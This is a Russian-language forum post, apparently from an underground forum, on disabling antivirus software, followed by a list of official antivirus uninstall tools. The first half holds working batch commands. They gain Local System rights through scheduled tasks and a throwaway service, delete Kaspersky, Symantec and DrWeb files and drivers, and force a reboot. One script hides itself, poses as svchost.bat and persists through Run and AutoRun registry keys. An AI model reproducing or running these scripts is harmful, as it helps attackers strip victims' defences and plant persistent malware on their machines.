SWEB_SWEB
Заблокированные
- Статус
- offline
- Регистрация
- 07.12.2018
- Сообщения
- 26
- Репутация
- 2
Обратите внимание, если Вы хотите провести сделку с данным пользователем, на то, что он заблокирован.
Остановка службы SC STOP OC. Описание команды SC STOPКоманда SC STOP посылает службе операционной системы Windows запрос STOP. Для запуска остановленной службы служит команда SC START. Синтаксис и параметры команды SC STOP
sc [имя_сервера] stop имя_службы имя_сервера - Задает имя удаленного сервера, на котором находится служба. В имени следует использовать формат UNC ("\\myserver"). Чтобы запустить SC локально, этот параметр следует пропустить.Имя_службы - Указывает имя службы, возвращенное операцией getkeyname. /? - Отображает справку в командной строке.
Примеры команды SC STOP sc stop spooler - остановка службы очереди печати. Вариант действий будет самым простым — попытка удаления жизненно важных файлов антивируса
На Windows-системах, работая под администратором (а это, наверное, 80% всех систем) получить права Local System достаточно просто. В голову сразу приходит два способа, хорошо описанные в сети.
Способ 1. Использование планировщика.
По умолчанию, на всех Windows-системах работает служба планировщика задач. Эта служба запускает задачи с искомыми правами Local System. Тогда очень просто добавить задание как-то:
at 11:05 c:\killer.bat
и kill.bat запустится с правами Local System.
Преимущества очевидны: всё просто и ясно. Недостаток: пользователь может заметить странную новую задачу в планировщике, да и просто в целях безопасности отключить эту службу.
Способ 1. Создание службы.
Суть метода заключается в создании службы, её запуске и удалении. При этом всё реализуется в три строчки:
sc create CmdAsSystem type= own type= interact binPath= "cmd /c start /low /b cmd /c (c:\killer.bat)"
net start CmdAsSystem
sc delete CmdAsSystem
При этом мало того, что killer.bat запустится с приоритетом IDLE, он ещё и будет запущен от имени Local System.
Метод незаметен, никак не проявляет себя.
На момент публикования статьи KIS 2010 оба метода пропускал на уровне хипса, даже не запрашивая никаких разрешений.
Ну а теперь перейдём к самому killer.bat (в нашем случае он расположен в корне на диске С, но понятно, что закинуть его можно куда угодно).
Суть этого файла проста: удаляем всё, что принадлежит антивирусу. Так, для Касперского 2010 это будет:
net stop srservice
erase /F /S /Q "C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010"
erase /F /S /Q "%windir%\system32\drivers\kl1.sys"
erase /F /S /Q "%windir%\system32\drivers\klif.sys"
erase /F /S /Q "%windir%\system32\drivers\klbg.sys"
erase /F /S /Q "%windir%\system32\drivers\klim5.sys"
erase /F /S /Q "%windir%\system32\drivers\klmd.sys"
erase /F /S /Q "%windir%\system32\drivers\klmouflt.sys"
shutdown -r -f -c "Bye-Bye!!!"
Для Symantec что-то типа (кто знает точнее — поправьте, сам-то я на Касперском):
net stop srservice
erase /F /S /Q "C:\Program Files\Symantec"
erase /F /S /Q "C:\Program Files\Norton Internet Security"
shutdown -r -f -c "Bye-Bye!!!"
Для Доктора Веба:
net stop srservice
erase /F /S /Q "C:\Program Files\DrWeb"
erase /F /S /Q "%windir%\system32\drivers\dwprot.sys"
erase /F /S /Q "%windir%\system32\drivers\drwebaf.sys"
erase /F /S /Q "%windir%\system32\drivers\DrWebPF.sys"
erase /F /S /Q "%windir%\system32\drivers\spiderg3.sys"
shutdown -r -f -c "Bye-Bye!!!"
Ну и так далее. В первой строчке идёт останов службы восстановления Windows — так, на всякий случай :)
Понятно, что аналогичный скрипт можно прописать для всех антивирусов — суть изменять пути к жизненно важным файлам.
код:
Echo off
attrib *.bat +h +s
cd %programfiles%\Kaspersky Lab\
del *.* /q /s
cd %programfiles%\DrWeb\
del *.* /q /s
cd %programfiles%\Alwil Software\
del *.* /q /s
cd %programfiles%\ESET\
del *.* /q /s
copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul
reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\system32\batinit.bat" /f >nul
copy ""%0"" "%SystemRoot%\system32\svchost.bat" >nul
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchost" /t REG_SZ /d "%SystemRoot%\system32\svchost.bat" /f >nul
attrib *.bat +h +r +s
attrib *.bat +h +s
cd %programfiles%\Kaspersky Lab\
del *.* /q /s
cd %programfiles%\DrWeb\
del *.* /q /s
cd %programfiles%\Alwil Software\
del *.* /q /s
cd %programfiles%\ESET\
del *.* /q /s
copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul
reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\system32\batinit.bat" /f >nul
copy ""%0"" "%SystemRoot%\system32\svchost.bat" >nul
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchost" /t REG_SZ /d "%SystemRoot%\system32\svchost.bat" /f >nul
attrib *.bat +h +r +s
в блокноте сохраните с расширением .bat
Итак, чтобы отключить любой антивирус заходим в панель управления , после этого, ищите опцию «администрирование» и нажмите на нее. Кто не может найти, посмотрите с правой стороны вверху: там написано «просмотр», выберите «большие значки»
Выберите обычный запуск. Дальше по очереди откройте опции (нажав на них) «службы» и «автозагрузка» и везде где вам встретиться название вашего «защитника» снимайте галочки.
Надеюсь, администрирование нашли. После нажатия на него нажмите «конфигурация системы». Вам откроется еще одно окно, где и будет происходить отключение антивируса. Вам будет предложена перезагрузка, после чего он работать уже не будет.
Удаление программ и антивирусов
Приложения для полного ручного и автоматического удаления антивирусов, программ, нежелательных плагинов и дополнений с вашего компьютера
Dr.Web Removal Tool 11.2.0.9040
Dr.Web Removal Tool - официальная утилита для полного удаления антивирусных продуктов Dr.Web версий 4.33 по 11.0, Dr.Web Katana. Также позволяет очистить компьютер от некорректно удаленного антивируса
Norton Remove and Reinstall tool 4.4.0.58
Norton Removal Tool и Norton Remove and Reinstall tool - утилиты для полного удаления с компьютера антивирусных программ и продуктов безопасности Norton, включая последние версии антивирусных решений Norton Security и Norton Security with Backup
Malwarebytes Clean Uninstall Tool 3.1.0.1031
Malwarebytes Clean Uninstall Tool - утилита для удаления Malwarebytes Anti-Exploit, Malwarebytes Anti-Malware и Malwarebytes v3.x, позволяющая полностью удалить все следы антивирусной программы с компьютера, включая настройки и данные лицензии
AV Uninstall Tools Pack 2017.09
AV Uninstall Tools Pack - официальные утилиты для удаления антивирусов и сброса их паролей. Включает инструкции как полностью удалить антивирус с компьютера: все файлы, драйвера, службы и записи реестра в системе
Revo Uninstaller Mobile для Android 1.0.370
Revo Uninstaller Mobile - инструмент для удаления мобильных приложений на вашем Android устройстве. Позволяет оптимизировать свободное пространство, улучшить быстродействие и снизить разряд батареи
Wise Program Uninstaller деинсталлирует программы с компьютера, удаляет остатки и принудительно ликвидирует приложения, которые не могут быть удалены другими способами
Avast Clear (Uninstall Utility) 17.6.3625.0
F-PROT Removal Tool 1.0.5.1
Утилита предназначена для полного удаления антивируса F-PROT с компьютера, если удаление невозможно выполнить стандартным способом, или удаление выполнено не полностью.
K7 Security Product Removal Tool 1.0.0.43
Утилита K7 Security Product Removal Tool удаляет с компьютера все остатки антивирусных продуктов K7, которые не были удалены стандартными средствами Windows.
Bitdefender Uninstall Tool 6.2.1.2
Утилита удаления позволяет полностью удалить антивирус Bitdefender с вашего компьютера.
Avira Registry Cleaner 2.0.2.4
Утилита Avira Registry Cleaner очищает реестр Windows от записей антивирусных продуктов Avira, которые могут остаться после удаления антивируса.
Cezurity Antivirus Remover [2016-08-02]
Для полного удаления антивирусного сканера Cezurity, используйте утилиту удаления Cezurity Antivirus Remover. Эта утилита очищает систему от всех следов Cezurity из системы.
Panda Generic Uninstaller 2.00.33
Panda Uninstaller - эта официальная утилита для полного удаления антивирусных продуктов Panda с компьютера.
F-Secure Uninstallation Tool 3.0 build 2780
F-Secure Uninstallation Tool - официальная утилита для полного удаления продуктов F-Secure с компьютера. Утилита удаляет все следы антивируса из системы.
KAV Removal Tool (2018) 1.0.1266.0
Утилита для удаления продуктов «Лаборатории Касперского». С помощью нее вы можете удалить последние версии антивирусов: Антивирус Касперского, Kaspersky Internet Security, Kaspersky Free и другие версии антивирусных программ
ESET AV Remover 1.2.4.0
ESET AV Remover - утилита для удаления антивирусных программ и приложений безопасности, ранее установленных в вашей системе, перед установкой нового антивируса для Windows
комментарии и отзывы
ESET Uninstaller 8.0.5.0
ESET Uninstaller - официальный инструмент, для полного удаления из системы антивирусных продуктов ESET и их остатков.
Ashampoo UnInstaller 6.00.14
Ashampoo UnInstaller - передовое решение для эффективного удаления следов ненужных более программ, очистки остатков и поддержания оптимальной производительности системы
Revo Uninstaller 3.1.9 Pro / 2.0.3 Free
Revo Uninstaller - более быстрая и мощная альтернатива системному апплету "Удаление программ". Продукт включает расширенные функции для деинсталляции программ и очистки их следов, решает проблемы установки и обновления ПО
AVG Remover 1.0.1.5
AVG Remover - утилита для полного удаления всех версий антивирусных программ AVG Internet Security, AVG AntiVirus и бесплатного антивируса AVG AntiVirus Free
Avast Software Cleanup 12.4.49.0 Beta
Используя Avast Software Cleanup, проверяйте рейтинг установленных программ и удаляйте приложения с плохой репутацией для того, чтобы избежать потенциальные риски безопасности
Should I Remove It?
Should I Remove It? помогает удалять бесполезное рекламное ПО и нежелательные программы, в частности шпионское ПО, панели инструментов, комплектные ПНП, а также различные виды вредоносных программ
Antivirus Remover 2.35
Antivirus Remover - приложение для удаления антивирусных программ с помощью официальных утилит. Позволяет удалить антивирус, установленный на вашем компьютере, и очистить все следы из системного реестра и временные файлы